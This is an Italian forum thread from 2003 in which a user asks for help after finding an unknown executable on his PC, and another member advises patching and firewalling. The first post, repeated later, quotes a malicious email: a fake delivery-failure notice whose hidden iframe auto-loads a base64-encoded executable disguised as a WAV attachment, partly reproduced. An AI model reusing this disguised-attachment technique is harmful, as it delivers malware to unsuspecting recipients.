help attacco hacker

andrew1979 · 26-09-2003, 12:49

ciao a tutti ieri è successa una cosa strana ho lasciato acceso tutto il giorno emule con win xp senza nessun firewall attivo ma solo con norton antivirus 2004 attivo. Quando sono arritavo a casa mi sono trovato una finestra dos con scritto impossibile eseguire l'operazione e sotto c: un file di nome bhdq.exe. Ho provato a cancellarlo ma niente da fare mi diceva ke era in uso da un altro programma. Successivamente sono riuscito a cancellarlo in modalità provvisoria e ho installato subito zone alarm. Ho fatto anke una scansione completa con norton aggiornatissimo ma non ho trovaro virus. Oggi ho ricevuto due e-mail strane di cui allego il testo:

Return-Path: <il.cipro@tiscali.it>
FROM: "Microsoft Network Mail Delivery Service" <smtpform@freemail.net>
TO: "Mail Client" <receiver@mxserver.com>
SUBJECT: Undelivered Mail: Returned To Sender
X-ID: 2335347195594778757148455
Mime-Version: 1.0
Content-Type: multipart/alternative;
boundary="mgswiur"

--mgswiur
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<HTML>
<HEAD></HEAD>
<BODY>
<iframe src=3D"cid:ktoftxjduptdlk" height=3D0 width=3D0></iframe>
<BR><BR>Hi.
<BR>I'm afraid =
I wasn't able to deliver your message =
to the following addresses:<BR>
<BR><BR><BR>Undelivered message to <B>zuaiqx@freemail.net</B>
</BODY></HTML>

--mgswiur
Content-Type: audio/x-wav; name="bhdq.exe"
Content-Transfer-Encoding: base64
Content-Id: <ktoftxjduptdlk>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV
ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/
AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA
AAAABAAAAAAAAAAAIAIAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA
AABY6gAAtAAAAACwAQCoZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAHACAAAAAAAAAAAAAAAAAAAAAAAA

qualcuno mi sa dire cosa è successo? posso stare tranquillo con il zone alarm attivo e dando a emule trusted zone? mi conviene formattare anke se spero non serva? grazie

andrew1979 · 26-09-2003, 12:52

ho dimenticato di dire ke allegato alle e-mail c'è il file ke ho nominato prima

gohan · 26-09-2003, 12:53

probabilmente un lameronzolo è riuscito a forzare il tuo pc ed eseguire da remoto dei comandi. Consiglio:
- fare windows update al più presto;
- impostare delle password agli utenti che non siano troppo facili (se non nulle)
- avere un firewall che chiuda le porte usate da window (dall 135 alla 139 e la 445).

andrew1979 · 26-09-2003, 13:12

ok mi sa ke per sicurezza formatto. Ke danni può aver fatto questo c*****e sul mio pc? E se formatto può cercare ancora di entrare sul mio pc dato ke sa il mio ip? Come faccio a bloccare quelle porte sul zone alarm? Ma ke passwork intendi? per l'e-mail per internet? Scusa per le 3000 domande ma voglio capire bene cosa fare prima di procedere. Grazie

gohan · 26-09-2003, 13:16

se installi le patch microsoft, dovresti essere abbastanza a posto.
Per le password intendo quelle degli utenti del pc.
Per le porte, se non erro, zone-alarm le dovrebbe già chiudere per default.

andrew1979 · 26-09-2003, 13:39

cmq per sicurezza preferisco formattare piccolo OT per emule basta ke mi copio tutta la cartella dopo aver formattato e mi conseva tutte le impostazioni? Se mi è stata fregata la password di connessione a alice c'è un modo per cambiarla o non si può? Cmq penso ke in teoria anke avendo quella password non servirebbe a niente perkè ho sentito dire ke adesso l'autenticazione è fatta sul numero di telefono e la password serve solo per l'e-mail

gohan · 26-09-2003, 14:28

per emule sì.
per la password, non credo che te l'abbiano fregata e poi di certo non possono usarla per connettersi ad alice a tue spese, visto che la linea va attivata sul doppino telefonico.

andrew1979 · 26-09-2003, 14:40

Gohan mi sà ke ti erigerò una statua grazie mille delle informazioni certo ke mi piacerebbe proprio risalire a quello s****o ke mi ha attaccato il pc!

gohan · 26-09-2003, 14:45

è difficile risalire a chi t'attacca; se hai un firewall che tiene il log dei tentativi d'intrusione è già qualcosa.

Penza che ad agosto c'è qualcuno che da un server di un'università spagnola si divertiva a piantarmi il router; poi ho aggiornato il firmware e non lo fa più.

26-09-2003, 12:49	#1
andrew1979 Senior Member Iscritto dal: Jul 2003 Città: Trento Messaggi: 663	help attacco hacker ciao a tutti ieri è successa una cosa strana ho lasciato acceso tutto il giorno emule con win xp senza nessun firewall attivo ma solo con norton antivirus 2004 attivo. Quando sono arritavo a casa mi sono trovato una finestra dos con scritto impossibile eseguire l'operazione e sotto c: un file di nome bhdq.exe. Ho provato a cancellarlo ma niente da fare mi diceva ke era in uso da un altro programma. Successivamente sono riuscito a cancellarlo in modalità provvisoria e ho installato subito zone alarm. Ho fatto anke una scansione completa con norton aggiornatissimo ma non ho trovaro virus. Oggi ho ricevuto due e-mail strane di cui allego il testo: Return-Path: <il.cipro@tiscali.it> FROM: "Microsoft Network Mail Delivery Service" <smtpform@freemail.net> TO: "Mail Client" <receiver@mxserver.com> SUBJECT: Undelivered Mail: Returned To Sender X-ID: 2335347195594778757148455 Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="mgswiur" --mgswiur Content-Type: text/html Content-Transfer-Encoding: quoted-printable <HTML> <HEAD></HEAD> <BODY> <iframe src=3D"cid:ktoftxjduptdlk" height=3D0 width=3D0></iframe> <BR><BR>Hi. <BR>I'm afraid = I wasn't able to deliver your message = to the following addresses:<BR> <BR><BR><BR>Undelivered message to <B>zuaiqx@freemail.net</B> </BODY></HTML> --mgswiur Content-Type: audio/x-wav; name="bhdq.exe" Content-Transfer-Encoding: base64 Content-Id: <ktoftxjduptdlk> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAB+i6hSOurGATrqxgE66sYBQfbKATvqxgG59sgBLerGAdL1zAEA6sYBWPXV ASvqxgE66scBnurGAdL1zQEx6sYBguzAATvqxgFSaWNoOurGAQAAAAAAAAAAUEUAAEwBBABwy2E/ AAAAAAAAAADgAA8BCwEGAADQAAAAQAEAAAAAAIWuAAAAEAAAAOAAAAAAQAAAEAAAABAAAAQAAAAA AAAABAAAAAAAAAAAIAIAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AABY6gAAtAAAAACwAQCoZwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOAAAHACAAAAAAAAAAAAAAAAAAAAAAAA qualcuno mi sa dire cosa è successo? posso stare tranquillo con il zone alarm attivo e dando a emule trusted zone? mi conviene formattare anke se spero non serva? grazie

26-09-2003, 12:53	#3
gohan Senior Member Iscritto dal: Jan 2001 Città: Reggio Emilia Messaggi: 19467	probabilmente un lameronzolo è riuscito a forzare il tuo pc ed eseguire da remoto dei comandi. Consiglio: - fare windows update al più presto; - impostare delle password agli utenti che non siano troppo facili (se non nulle) - avere un firewall che chiuda le porte usate da window (dall 135 alla 139 e la 445). __________________ NO AL RITORNO DEL NUCLEARE Cerco dissipatore HR-05 IFX -Storie dalla sala macchine

26-09-2003, 13:16	#5
gohan Senior Member Iscritto dal: Jan 2001 Città: Reggio Emilia Messaggi: 19467	se installi le patch microsoft, dovresti essere abbastanza a posto. Per le password intendo quelle degli utenti del pc. Per le porte, se non erro, zone-alarm le dovrebbe già chiudere per default. __________________ NO AL RITORNO DEL NUCLEARE Cerco dissipatore HR-05 IFX -Storie dalla sala macchine

26-09-2003, 14:28	#7
gohan Senior Member Iscritto dal: Jan 2001 Città: Reggio Emilia Messaggi: 19467	per emule sì. per la password, non credo che te l'abbiano fregata e poi di certo non possono usarla per connettersi ad alice a tue spese, visto che la linea va attivata sul doppino telefonico. __________________ NO AL RITORNO DEL NUCLEARE Cerco dissipatore HR-05 IFX -Storie dalla sala macchine

26-09-2003, 14:45	#9
gohan Senior Member Iscritto dal: Jan 2001 Città: Reggio Emilia Messaggi: 19467	è difficile risalire a chi t'attacca; se hai un firewall che tiene il log dei tentativi d'intrusione è già qualcosa. Penza che ad agosto c'è qualcuno che da un server di un'università spagnola si divertiva a piantarmi il router; poi ho aggiornato il firmware e non lo fa più. __________________ NO AL RITORNO DEL NUCLEARE Cerco dissipatore HR-05 IFX -Storie dalla sala macchine

26-09-2003, 12:52	#2
andrew1979 Senior Member Iscritto dal: Jul 2003 Città: Trento Messaggi: 663	ho dimenticato di dire ke allegato alle e-mail c'è il file ke ho nominato prima

26-09-2003, 13:12	#4
andrew1979 Senior Member Iscritto dal: Jul 2003 Città: Trento Messaggi: 663	ok mi sa ke per sicurezza formatto. Ke danni può aver fatto questo c*****e sul mio pc? E se formatto può cercare ancora di entrare sul mio pc dato ke sa il mio ip? Come faccio a bloccare quelle porte sul zone alarm? Ma ke passwork intendi? per l'e-mail per internet? Scusa per le 3000 domande ma voglio capire bene cosa fare prima di procedere. Grazie

26-09-2003, 13:39	#6
andrew1979 Senior Member Iscritto dal: Jul 2003 Città: Trento Messaggi: 663	cmq per sicurezza preferisco formattare piccolo OT per emule basta ke mi copio tutta la cartella dopo aver formattato e mi conseva tutte le impostazioni? Se mi è stata fregata la password di connessione a alice c'è un modo per cambiarla o non si può? Cmq penso ke in teoria anke avendo quella password non servirebbe a niente perkè ho sentito dire ke adesso l'autenticazione è fatta sul numero di telefono e la password serve solo per l'e-mail

26-09-2003, 14:40	#8
andrew1979 Senior Member Iscritto dal: Jul 2003 Città: Trento Messaggi: 663	Gohan mi sà ke ti erigerò una statua grazie mille delle informazioni certo ke mi piacerebbe proprio risalire a quello s****o ke mi ha attaccato il pc!

Strumenti
Mostra una versione stampabile Invia questa pagina per email